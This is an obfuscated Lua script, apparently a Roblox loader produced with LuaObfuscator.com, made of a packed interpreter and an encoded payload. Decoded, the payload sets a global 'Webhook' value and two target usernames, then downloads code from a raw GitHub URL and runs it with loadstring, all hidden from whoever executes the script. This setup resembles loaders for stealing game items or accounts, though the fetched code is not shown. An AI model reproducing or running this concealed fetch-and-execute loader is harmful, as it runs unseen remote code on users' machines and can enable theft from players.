--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v66=0;while true do if (v66==0) then v19=v0(v3(v30,1,1));return "";end end else local v67=0;local v68;while true do if (v67==0) then v68=v2(v0(v30,16));if v19 then local v96=v5(v68,v19);v19=nil;return v96;else return v68;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v69=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-((558 + 62) -(555 + (91 -27))))) + (932 -((1922 -(68 + 997)) + 74)))) ;return v69-(v69%(569 -(367 + (1471 -(226 + 1044))))) ;else local v70=927 -(214 + 713) ;local v71;while true do if (v70==(0 + 0)) then v71=((4 -3) + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v71 + v71))>=v71) and 1) or (1637 -(1523 + (231 -(32 + 85)))) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 2 ;return (v36 * (57 + 199)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + (9 -5) ;return (v40 * (31011612 -14234396)) + (v39 * (120312 -54776)) + (v38 * (606 -(87 + (443 -(67 + 113))))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=1 + 0 ;local v44=(v20(v42,2 -1 ,62 -42 ) * ((2 + 0)^(127 -95))) + v41 ;local v45=v20(v42,39 -(10 + 8) ,983 -((3084 -2282) + 150) );local v46=((v20(v42,85 -53 )==(1 -0)) and  -(1 + 0)) or 1 ;if (v45==0) then if (v44==((1439 -(416 + 26)) -(915 + 82))) then return v46 * (0 -0) ;else v45=(3 -2) + 0 ;v43=0 -0 ;end elseif (v45==(3234 -(1069 + 118))) then return ((v44==(0 -0)) and (v46 * ((1 -0)/(0 + 0 + 0)))) or (v46 * NaN) ;end return v8(v46,v45-(1817 -794) ) * (v43 + (v44/((2 + 0)^(843 -(368 + 423))))) ;end local function v25(v47)local v48=0;local v49;local v50;while true do if (v48==(1 -0)) then v49=v3(v16,v18,(v18 + v47) -(1 + 0) );v18=v18 + v47 ;v48=440 -(145 + 293) ;end if ((432 -(44 + 386))==v48) then v50={};for v75=1, #v49 do v50[v75]=v2(v1(v3(v49,v75,v75)));end v48=1489 -(998 + (1781 -1293)) ;end if (v48==(0 + 0)) then v49=nil;if  not v47 then local v93=0 + 0 ;while true do if (v93==(772 -(201 + (2027 -1456)))) then v47=v23();if (v47==(1138 -(116 + 1022))) then return "";end break;end end end v48=4 -3 ;end if (v48==3) then return v6(v50);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 + 0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51==3) then v58=nil;while true do local v77=0;local v78;while true do if (v77==(1637 -(195 + 1442))) then v78=0 -0 ;while true do if (v78==1) then if (v52==(0 + 0)) then local v103=0;while true do if (v103==0) then v53={};v54={};v103=1;end if (v103~=1) then else v55={};v52=1 + 0 ;break;end end end if (v52~=2) then else local v104=0;local v105;while true do if (v104==(396 -(115 + 281))) then v105=0 -0 ;while true do if (v105==1) then for v147=1,v23() do local v148=0 + 0 ;local v149;local v150;local v151;while true do if (v148~=(2 -1)) then else v151=nil;while true do if (0==v149) then local v171=0 -0 ;while true do if (v171==(867 -(550 + 317))) then v150=0 -0 ;v151=nil;v171=1 -0 ;end if (v171==(2 -1)) then v149=286 -(134 + 151) ;break;end end end if (v149==(1666 -(970 + 695))) then while true do if (v150~=0) then else v151=v21();if (v20(v151,1 -0 ,1)~=0) then else local v174=1990 -(582 + 1408) ;local v175;local v176;local v177;local v178;while true do if (v174==2) then while true do if ((3 -2)==v175) then local v179=0 -0 ;while true do if (0==v179) then v178={v22(),v22(),nil,nil};if (v176==(0 -0)) then local v187=241 -(187 + 54) ;local v188;local v189;while true do if (v187==(780 -(162 + 618))) then v188=0 + 0 ;v189=nil;v187=1 + 0 ;end if (v187~=(1 -0)) then else while true do if (v188==(0 -0)) then v189=0 + 0 ;while true do if (v189==(1636 -(1373 + 263))) then v178[3]=v22();v178[4]=v22();break;end end break;end end break;end end elseif (v176==(1001 -(451 + 549))) then v178[3]=v23();elseif (v176==2) then v178[3]=v23() -((1 + 1)^16) ;elseif (v176==(4 -1)) then local v194=0 -0 ;local v195;while true do if (v194==0) then v195=1384 -(746 + 638) ;while true do if (0==v195) then v178[2 + 1 ]=v23() -(2^(23 -7)) ;v178[345 -(218 + 123) ]=v22();break;end end break;end end end v179=1;end if (v179~=(1582 -(1535 + 46))) then else v175=2 + 0 ;break;end end end if (v175~=0) then else local v180=0;local v181;while true do if ((0 + 0)==v180) then v181=0;while true do if (v181==(561 -(306 + 254))) then v175=1 + 0 ;break;end if (v181~=(0 -0)) then else local v190=0;while true do if (v190~=(1467 -(899 + 568))) then else v176=v20(v151,2 + 0 ,3);v177=v20(v151,4,14 -8 );v190=1;end if (v190~=(604 -(268 + 335))) then else v181=291 -(60 + 230) ;break;end end end end break;end end end if (v175==(574 -(426 + 146))) then local v182=0 + 0 ;local v183;while true do if (v182~=(1456 -(282 + 1174))) then else v183=811 -(569 + 242) ;while true do if (v183~=(0 -0)) then else local v191=0;while true do if (v191==1) then v183=1;break;end if (v191~=0) then else if (v20(v177,1,1)==1) then v178[2]=v58[v178[2]];end if (v20(v177,2,2)~=1) then else v178[1 + 2 ]=v58[v178[1027 -(706 + 318) ]];end v191=1252 -(721 + 530) ;end end end if (v183==1) then v175=3;break;end end break;end end end if (v175==3) then if (v20(v177,1274 -(945 + 326) ,3)~=(2 -1)) then else v178[4]=v58[v178[4]];end v53[v147]=v178;break;end end break;end if (v174==(1 + 0)) then v177=nil;v178=nil;v174=702 -(271 + 429) ;end if (v174==(0 + 0)) then v175=1500 -(1408 + 92) ;v176=nil;v174=1087 -(461 + 625) ;end end end break;end end break;end end break;end if (v148~=(1288 -(993 + 295))) then else v149=0;v150=nil;v148=1;end end end v52=1 + 2 ;break;end if (v105~=0) then else local v126=1171 -(418 + 753) ;while true do if (v126~=(0 + 0)) then else for v167=1,v57 do local v168=0 + 0 ;local v169;local v170;while true do if (v168~=(0 + 0)) then else local v172=0 + 0 ;while true do if (0==v172) then v169=v21();v170=nil;v172=530 -(406 + 123) ;end if (v172==1) then v168=1770 -(1749 + 20) ;break;end end end if (v168==(1 + 0)) then if (v169==(1323 -(1249 + 73))) then v170=v21()~=(0 + 0) ;elseif (v169==(1147 -(466 + 679))) then v170=v24();elseif (v169~=3) then else v170=v25();end v58[v167]=v170;break;end end end v56[3]=v21();v126=1;end if (v126==1) then v105=2 -1 ;break;end end end end break;end end end break;end if (v78==0) then if (v52~=1) then else local v106=0;while true do if (v106==1) then v58={};v52=5 -3 ;break;end if (v106==0) then v56={v53,v54,nil,v55};v57=v23();v106=1;end end end if (v52==3) then for v107=1,v23() do v54[v107-1 ]=v28();end return v56;end v78=1;end end break;end end end break;end if (v51==(1 + 0)) then v54=nil;v55=nil;v51=2;end if (v51~=(5 -3)) then else v56=nil;v57=nil;v51=7 -4 ;end if (v51~=(114 -(4 + 110))) then else v52=0;v53=nil;v51=1;end end end local function v29(v59,v60,v61)local v62=0;local v63;local v64;local v65;while true do if (0==v62) then v63=v59[1];v64=v59[2];v62=1;end if (v62==1) then v65=v59[3];return function(...)local v79=v63;local v80=v64;local v81=v65;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v94=0,v87 do if (v94>=v81) then v85[v94-v81 ]=v86[v94 + 1 ];else v89[v94]=v86[v94 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v95=0;while true do if (v95==1) then if (v92<=10) then if (v92<=4) then if (v92<=1) then if (v92>0) then local v109=v91[2];v89[v109]=v89[v109](v13(v89,v109 + 1 ,v84));else v89[v91[2]]();end elseif (v92<=2) then v89[v91[2]][v91[3]]=v91[4];elseif (v92==3) then do return;end else v83=v91[3];end elseif (v92<=7) then if (v92<=5) then v83=v91[3];elseif (v92==6) then local v128=v91[2];local v129,v130=v82(v89[v128](v13(v89,v128 + 1 ,v91[3])));v84=(v130 + v128) -1 ;local v131=0;for v152=v128,v84 do v131=v131 + 1 ;v89[v152]=v129[v131];end else local v132=0;local v133;local v134;while true do if (1==v132) then v89[v133 + 1 ]=v134;v89[v133]=v134[v91[4]];break;end if (v132==0) then v133=v91[2];v134=v89[v91[3]];v132=1;end end end elseif (v92<=8) then v89[v91[2]]=v91[3]~=0 ;elseif (v92>9) then v89[v91[2]]();elseif (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92<=15) then if (v92<=12) then if (v92>11) then local v115=0;local v116;local v117;local v118;local v119;while true do if (v115==0) then v116=v91[2];v117,v118=v82(v89[v116](v13(v89,v116 + 1 ,v91[3])));v115=1;end if (v115==1) then v84=(v118 + v116) -1 ;v119=0;v115=2;end if (v115==2) then for v157=v116,v84 do v119=v119 + 1 ;v89[v157]=v117[v119];end break;end end else v89[v91[2]][v91[3]]=v91[4];end elseif (v92<=13) then v89[v91[2]]=v61[v91[3]];elseif (v92==14) then v89[v91[2]]=v91[3]~=0 ;elseif (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92<=18) then if (v92<=16) then local v124=v91[2];v89[v124]=v89[v124](v13(v89,v124 + 1 ,v84));elseif (v92==17) then v89[v91[2]]=v91[3];else v89[v91[2]]=v61[v91[3]];end elseif (v92<=19) then do return;end elseif (v92==20) then v89[v91[2]]=v91[3];else local v142=v91[2];local v143=v89[v91[3]];v89[v142 + 1 ]=v143;v89[v142]=v143[v91[4]];end v83=v83 + 1 ;break;end if (0==v95) then v91=v79[v83];v92=v91[1];v95=1;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03013O0020030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D65030A3O0047616D6572416C65784403093O00557365724E616D6532030B3O0047616D6572416C6578443200173O0012143O00013O00260F3O000E00010002002O043O000E000100120D000100033O00300200010004000500120D000100063O00120D000200073O002007000200020008001214000400094O0008000500014O000C000200054O000100013O00024O000100010001002O043O0016000100260F3O000100010001002O043O0001000100120D000100033O0030020001000A000B00120D000100033O0030020001000C000D0012143O00023O002O043O000100012O00033O00017O00",v9(),...);end
